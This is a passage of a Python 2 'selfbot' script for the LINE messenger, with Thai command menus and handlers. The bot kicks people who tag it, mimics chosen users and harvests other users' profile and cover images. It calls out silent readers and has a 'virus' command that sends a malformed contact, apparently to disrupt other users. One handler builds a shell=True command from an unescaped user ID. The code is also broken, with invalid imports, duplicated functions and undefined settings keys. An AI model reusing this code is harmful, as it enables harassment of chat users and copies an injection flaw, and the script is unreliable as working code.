║✰ลบแชท ➠เซลบอทลบแชต ╠══════════════════ ║ ✦เปิด/ปิดข้อความต้อนรับ✦ ╠══════════════════ ║✰ Thx1 on ➠เปิดข้อความต้อนรับ ║✰ Thx1 off ➠ปิดข้อความต้อนรับ ║✰ Thx2 on ➠เปิดข้อความออกกลุ่ม ║✰ Thx2 off ➠เปิดข้อความออกกลุ่ม ║✰ Thx3 on ➠เปิดข้อความคนลบ ║✰ Thx3 off 
➠เปิดข้อความคนลบ ║✰ M on ➠เปิดเเจ้งเตือนตนเอง ║✰ M off ➠ปิดเเจ้งเตือนตนเอง ║✰ Tag on ➠เปิดกล่าวถึงเเท็ค ║✰ Tag off ➠ปิดกล่าวถึงเเท็ค ║✰ Kicktag on ➠เปิดเตะคนเเท็ค ║✰ Kicktag off ➠ปิดเตะคนเเท็ค ╠══════════════════ ║ ⌚โหมดตั้งค่าข้อความ⌚ ╠══════════════════ ║✰ Thx1˓: ➠ไส่ข้อความต้อนรับ ║✰ Thx2˓: ➠ไส่ข้อความออกจากกลุ่ม ║✰ Thx3˓: ➠ไส่ข้อความเมื่อมีคนลบ ╠══════════════════ ║✰ Thx1 ➠เช็คข้อความต้อนรับ ║✰ Thx2 ➠เช็คข้อความคนออก ║✰ Thx3 ➠เช็คข้อความคนลบ ╠═════════════════ ║ ─┅═✥ᵀᴴᴬᴵᴸᴬᴺᴰ✥═┅─ ║ •─✯͜͡ ✯RED★SAMURI★SELFBOT✯͜͡ ✯─• ╠══════════════════""" KAC=[cl] mid = cl.getProfile().mid mid = cl.getProfile().mid Bots=[mid,"ub5abe828cd964292195c3c59d6322033"] admin=["ub5abe828cd964292195c3c59d6322033"] wait = { "likeOn":False, "alwayRead":False, "detectMention":True, "kickMention":False, "steal":True, 'pap':{}, 'invite':{}, "spam":{}, 'contact':False, 'autoJoin':True, 'autoCancel':{"on":False,"members":5}, 'leaveRoom':True, 'timeline':False, 'autoAdd':True, 'message':"""🌾(●´з`)♡🌹แอดมาทำไมคับ 🌸แอดมาจีบรึแอดมารัน🌹(´ε` )♡🌾""", "lang":"JP", "comment":"...by redbot", "commentOn":False, "commentBlack":{}, "wblack":False, "dblack":False, "clock":False, "cNames":" ─┅͜͡✥ه﷽ Red﷽ه✥͜͡", "cNames":"", "blacklist":{}, "wblacklist":False, "dblacklist":False, "protect":False, "cancelprotect":False, "inviteprotect":False, "linkprotect":False, "Sider":{}, "Simi":{}, "lang":"JP", "BlGroup":{} } wait2 = { "readPoint":{}, "readMember":{}, "setTime":{}, "ROM":{} } cctv = { "cyduk":{}, "point":{}, "sidermem":{} } mimic = { "copy":False, "copy2":False, "status":False, "target":{} } settings = { "simiSimi":{} } res = { 'num':{}, 'us':{}, 'au':{}, } setTime = {} setTime = wait2['setTime'] mulai = time.time() contact = cl.getProfile() backup = cl.getProfile() backup.displayName = contact.displayName backup.statusMessage = contact.statusMessage backup.pictureStatus = contact.pictureStatus def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" #Finding 'Next Image' from the given raw page def _images_get_next_item(s): start_line = s.find('rg_di') if start_line == -1: #If no links are found then give an error! 
end_quote = 0 link = "no_links" return link, end_quote else: start_line = s.find('"class="rg_meta"') start_content = s.find('"ou"',start_line+90) end_content = s.find(',"ow"',start_content-90) content_raw = str(s[start_content+6:end_content-1]) return content_raw, end_content def sendAudio(self, to, path): objectId = self.sendMessage(to=to, text=None, contentType = 3).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': objectId, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.server.postContent(self.server.LINE_OBS_DOMAIN + '/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload audio failure.') return True def sendAudio(self, to_, path): M = Message(to=to_,contentType = 3) M.contentMetadata = None M.contentPreview = None M_id = self.Talk.client.sendMessage(0,M).id files = { 'file': open(path, 'rb'), } params = { 'name': 'media', 'oid': M_id, 'size': len(open(path, 'rb').read()), 'type': 'audio', 'ver': '1.0', } data = { 'params': json.dumps(params) } r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files) if r.status_code != 201: raise Exception('Upload image failure.') return True def sendAudioWithURL(self, to_, url): path = 'pythonLiness.data' r = requests.get(url, stream=True) if r.status_code == 200: with open(path, 'w') as f: shutil.copyfileobj(r.raw, f) else: raise Exception('Download Audio failure.') try: self.sendAudio(to_, path) except Exception as e: raise e #Getting all links with the help of '_images_get_next_image' def _images_get_all_items(page): items = [] while True: item, end_content = _images_get_next_item(page) if item == "no_links": break else: items.append(item) #Append all the links in the list named 'Links' time.sleep(0.1) #Timer could be used to slow down the request for image downloads page = page[end_content:] return items def download_page(url): version = (3,0) cur_version = sys.version_info if cur_version >= version: #If the Current Version of Python is 3.0 or above import urllib,request #urllib library for Extracting web pages try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib,request.Request(url, headers = headers) resp = urllib,request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print(str(e)) else: #If the Current Version of Python is 2.x import urllib2 try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers = headers) response = urllib2.urlopen(req) page = response.read() return page except: return"Page Not found" def upload_tempimage(client): ''' Upload a picture of a kitten. We don't ship one, so get creative! ''' config = { 'album': album, 'name': 'bot auto upload', 'title': 'bot auto upload', 'description': 'bot auto upload' } print("Uploading image... 
") image = client.upload_from_path(image_path, config=config, anon=False) print("Done") print() def summon(to, nama): aa = "" bb = "" strt = int(14) akh = int(14) nm = nama for mm in nm: akh = akh + 2 aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},""" strt = strt + 6 akh = akh + 4 bb += "\xe2\x95\xa0 @x \n" aa = (aa[:int(len(aa)-1)]) msg = Message() msg.to = to msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90" msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'} print "[Command] Tag All" try: cl.sendMessage(msg) except Exception as error: print error def waktu(secs): mins, secs = divmod(secs,60) hours, mins = divmod(mins,60) return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs) def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX... tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"] for texX in tex: for command in commands: if string ==command: return True return False def sendMessage(to, text, contentMetadata={}, contentType=0): mes = Message() mes.to, mes.from_ = to, profile.mid mes.text = text mes.contentType, mes.contentMetadata = contentType, contentMetadata if to not in messageReq: messageReq[to] = -1 messageReq[to] += 1 def bot(op): try: if op.type == 0: return if op.type == 5: if wait["autoAdd"] == True: cl.findAndAddContactsByMid(op.param1) if (wait["message"] in [""," ","\n",None]): pass else: cl.sendText(op.param1,str(wait["message"])) if op.type == 55: try: group_id = op.param1 user_id=op.param2 subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, ) except Exception as e: print e if op.type == 55: try: if cctv['cyduk'][op.param1]==True: if op.param1 in cctv['point']: Name = cl.getContact(op.param2).displayName # Name = summon(op.param2) if Name in cctv['sidermem'][op.param1]: pass else: cctv['sidermem'][op.param1] += "\n• " + Name if " " in Name: nick = Name.split(' ') if len(nick) == 2: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nรู้นะว่าอ่านอยู่. . .\nออกมาคุยเดี๋ยวนี้ (-__-) ") time.sleep(0.2) summon(op.param1,[op.param2]) else: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nนี่ก็อีกคน. . 
.อ่านอย่างเดียวเลย\nไม่ออกมาคุยล่ะ (-__-) ") time.sleep(0.2) summon(op.param1,[op.param2]) else: cl.sendText(op.param1, "ฮั่นแน่ " + "☞ " + Name + " ☜" + "\nแอบกันจังเลยนะ???\nคิดว่าเป็นนินจารึไง...??😆😆 ") time.sleep(0.2) summon(op.param1,[op.param2]) else: pass else: pass except: pass else: pass if op.type == 25: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 19: if mid in op.param3: wait["blacklist"][op.param2] = True if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 25: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == "ub5abe828cd964292195c3c59d6322033": if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) G = cl.getGroup(list_[1]) G.preventJoinByTicket = True cl.updateGroup(G) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata["postEndUrl"] cl.like(url[25:58], url[66:], likeType=1001) if op.type == 25: msg = op.message if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True: text = msg.text if text is not None: cl.sendText(msg.to,text) if op.type == 26: msg = op.message if msg.to in settings["simiSimi"]: if settings["simiSimi"][msg.to] == True: if msg.text is not None: text = msg.text r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt") data = r.text data = json.loads(data) if data['status'] == 200: if data['result']['result'] == 100: cl.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8')) if 'MENTION' in msg.contentMetadata.keys() != None: if wait["detectMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " มีไร ?, ", cName + " แทคทมาย? จะถามไรเชิญที่แชทส.ต, " + cName + "?", " แทคอีกแระ? แทคแล้วไม่พูดโดนดีดนะ😄😄, " + cName + "?","ว่างายยย...มีอะไรกะว่ามา?, ", "จิแทคทำไมนักวุ้.. เดะปั๊ดจับปี้ซะรุย"] ret_ = "." 
+ random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) break if 'MENTION' in msg.contentMetadata.keys() != None: if wait["kickMention"] == True: contact = cl.getContact(msg.from_) cName = contact.displayName balas = ["",cName + " คุณทำผิดกฎ?, ", cName + " ไม่ต้องถามว่าโดนเพราะอะไร?, " + cName + "?", "งงละดิ😆😆, " + cName + "?","เดะจิโดนไม่ใช่น้อย., ", "บอกแล้วไม่ฟัง -_-, "] ret_ = "**Auto Respond** " + random.choice(balas) name = re.findall(r'@(\w+)', msg.text) mention = ast.literal_eval(msg.contentMetadata['MENTION']) mentionees = mention['MENTIONEES'] for mention in mentionees: if mention['M'] in Bots: cl.sendText(msg.to,ret_) cl.kickoutFromGroup(msg.to,[msg.from_]) if msg.contentType == 13: if wait['invite'] == True: _name = msg.contentMetadata["displayName"] invite = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: cl.sendText(msg.to, _name + " เชิญคนนี้เข้ากลุ่มแล้ว") else: targets.append(invite) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) cl.inviteIntoGroup(msg.to,[target]) cl.sendText(msg.to,"Invite " + _name) wait['invite'] = False break except: cl.sendText(msg.to,"Error") wait['invite'] = False break if msg.contentType == 13: if wait["steal"] == True: _name = msg.contentMetadata["displayName"] copy = msg.contentMetadata["mid"] groups = cl.getGroup(msg.to) pending = groups.invitee targets = [] for s in groups.members: if _name in s.displayName: print "[Target] Stealed" break else: targets.append(copy) if targets == []: pass else: for target in targets: try: cl.findAndAddContactsByMid(target) contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + msg.contentMetadata["mid"] + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) wait["steal"] = False break except: pass if wait["alwayRead"] == True: if msg.toType == 0: cl.sendChatChecked(msg.from_,msg.id) else: cl.sendChatChecked(msg.to,msg.id) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"In Blacklist") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"Nothing") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"Not in Blacklist") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"In Blacklist") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"Done") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"Done") wait["dblacklist"] = False else: wait["dblacklist"] = False 
cl.sendText(msg.to,"Done") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = msg.contentMetadata["postEndUrl"] cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text.lower() == 'help0': if wait["lang"] == "JP": cl.sendText(msg.to,helpThx) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help': if wait["lang"] == "JP": cl.sendText(msg.to,helpmsg) else: cl.sendText(msg.to,helpmsg) elif msg.text.lower() == 'help1': if wait["lang"] == "JP": cl.sendText(msg.to,helppro) else: cl.sendText(msg.to,helppro) elif msg.text.lower() == 'help2': if wait["lang"] == "JP": cl.sendText(msg.to,helpself) else: cl.sendText(msg.to,helpself) elif msg.text.lower() == 'help3': if wait["lang"] == "JP": cl.sendText(msg.to,helpgrup) else: cl.sendText(msg.to,helpgrup) elif msg.text.lower() == 'help4': if wait["lang"] == "JP": cl.sendText(msg.to,helpset) else: cl.sendText(msg.to,helpset) elif msg.text.lower() == 'help5': if wait["lang"] == "JP": cl.sendText(msg.to,helptranslate) else: cl.sendText(msg.to,helptranslate) elif msg.text in ["Sp","Speed","speed"]: start = time.time() cl.sendText(msg.to, "「ความเร็วของเอว」") elapsed_time = time.time() - start cl.sendText(msg.to, "%s/ต่อวินาที😆😆" % (elapsed_time)) elif msg.text == "วัดรอบ": cl.sendText(msg.to,"「 วัดความเร็ว」") start = time.time() for i in range(3000): 1+1 elsp = time.time() - start cl.sendText(msg.to,"%s/ต่อวินาที" % (elsp)) elif msg.text.lower() == 'ไวรัส': msg.contentType = 13 msg.contentMetadata = {'mid': "u1f41296217e740650e0448b96851a3e2',"} cl.sendMessage(msg) elif msg.text.lower() == 'me': msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif ".fb" in msg.text: a = msg.text.replace(".fb","") b = urllib.quote(a) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses") cl.sendText(msg.to, "https://www.facebook.com" + b) cl.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses") #========================== FOR COMMAND BOT STARTING =============================# elif msg.text.lower() == 'เปิดคท': if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") else: cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ ση") elif msg.text.lower() == 'ปิดคท': if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: 
cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ɕσηϯαɕϯ ςεϯ ϯσ σƒƒ") else: cl.sendText(msg.to,"ɕσηϯαɕϯ αʆɾεαδψ σƒƒ") elif msg.text.lower() == 'เปิดกัน': if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protecion Already On") else: cl.sendText(msg.to,"Protecion Already On") elif msg.text.lower() == 'กันลิ้ง': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already On") else: cl.sendText(msg.to,"Protection Qr already On") elif msg.text.lower() == 'กันเชิญ': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already On") else: cl.sendText(msg.to,"Protection Invite already On") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи") else: cl.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи") elif msg.text.lower() == 'กันยก': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи") else: cl.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи") elif msg.text.lower() == 'เปิดเข้า': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σи") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σи") elif msg.text.lower() == 'ปิดเข้า': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"αυтσʝσιи ѕєт тσ σff") else: cl.sendText(msg.to,"αυтσʝσιи αℓяєα∂у σff") elif msg.text.lower() == 'ปิดกัน': if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection already Off") else: cl.sendText(msg.to,"Protection already Off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ρяσтє¢тισи ѕєт тσ σff") else: cl.sendText(msg.to,"ρяσтє¢тισи αℓяєα∂у σff") elif msg.text.lower() == 'ปิดกันลิ้ง': if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already off") else: cl.sendText(msg.to,"Protection Qr already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Qr already Off") else: cl.sendText(msg.to,"Protection Qr already Off") elif msg.text.lower() == 'ปิดกันเชิญ': if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Invite already Off") else: cl.sendText(msg.to,"Protection Invite already Off") elif msg.text.lower() == 'ปิดกันยก': if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") else: 
wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protection Cancel already Off") else: cl.sendText(msg.to,"Protection Cancel already Off") elif "ออก:" in msg.text: try: strnum = msg.text.replace("ออก:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"ปิดใช้งานการปฏิเสธการเข้าร่วมกลุ่ม") else: cl.sendText(msg.to,"ปิดคำเชิญถูกปฏิเสธ โปรดระบุจำนวนที่ใช้ในการเปิดเมื่อคุณต้องการส่ง") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "กลุ่มต่อไปที่ได้รับเชิญจะถูกปฏิเสธโดยอัตโนมัติ") else: cl.sendText(msg.to,strnum + "ปฏิเสธการสร้างคำเชิญโดยอัตโนมัติ") except: if wait["lang"] == "JP": cl.sendText(msg.to,"Nilai tidak benar") else: cl.sendText(msg.to,"Weird value") elif msg.text.lower() == 'เปิดออก': if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"เปิดระบบออกแชทโดยอัตโนมัติ") else: cl.sendText(msg.to,"เปิดระบบออกแชทไว้อยู่แล้ว") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to on") else: cl.sendText(msg.to,"Auto Leave room already on") elif msg.text.lower() == 'ปิดออก': if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"ปิดระบบออกแชทโดยอัตโนมัติ") else: cl.sendText(msg.to,"ปิดระบบออกแชทโดยอัตโนมัติไว้อยู่แล้ว") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Leave room set to off") else: cl.sendText(msg.to,"Auto Leave room already off") elif msg.text.lower() == 'เปิดแชร์': if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to on") else: cl.sendText(msg.to,"Share already on") elif msg.text.lower() == 'ปิดแชร์': if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Share set to off") else: cl.sendText(msg.to,"Share already off") #======================================================# elif msg.text in ["Thx1","thx1"]: cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"])) elif msg.text in ["Thx2","thx2"]: cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"])) elif msg.text in ["Thx3","thx3"]: cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"])) #======================================================# elif "Thx1:" in msg.text: c = msg.text.replace("Thx1:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["acomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c) elif "Thx2:" in msg.text: c = msg.text.replace("Thx2:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["bcomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c) elif "Thx3:" in msg.text: c = msg.text.replace("Thx3:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!") else: wait["ccomment"] = c cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c) #======================================================# elif msg.text in ["Thx1 on"]: if wait["acommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already on") else: wait["acommentOn"] = True if wait["lang"] == "JP": 
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx1 off"]: if wait["acommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already off") else: wait["acommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Thx2 on"]: if wait["bcommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already on") else: wait["bcommentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx2 off"]: if wait["bcommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already off") else: wait["bcommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Thx3 on"]: if wait["ccommentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already on") else: wait["ccommentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Thx3 off"]: if wait["ccommentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already off") else: wait["ccommentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌") else: cl.sendText(msg.to,"Already off") #======================================================# elif msg.text in ["Red on","red on"]: cl.sendText(msg.to,"一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一") cl.sendText(msg.to,"Please wait......") cl.sendText(msg.to,"Turn on all protection") cl.sendText(msg.to,"Qr on") cl.sendText(msg.to,"Backup:on") cl.sendText(msg.to,"Read:on") cl.sendText(msg.to,"Respon:on") cl.sendText(msg.to,"Responkick:on") cl.sendText(msg.to,"Protect on") cl.sendText(msg.to,"Namelock:on") cl.sendText(msg.to,"Blockinvite:on") #======================================================# elif msg.text in ["Red off","red off"]: cl.sendText(msg.to,"一━═┻̿︻̷̿▄☜RED☆SAMURI☆SELFBOT☞ ▄︻̷̿┻̿═━一") cl.sendText(msg.to,"Please wait......") cl.sendText(msg.to,"Turn off all protection") cl.sendText(msg.to,"Qr:off") 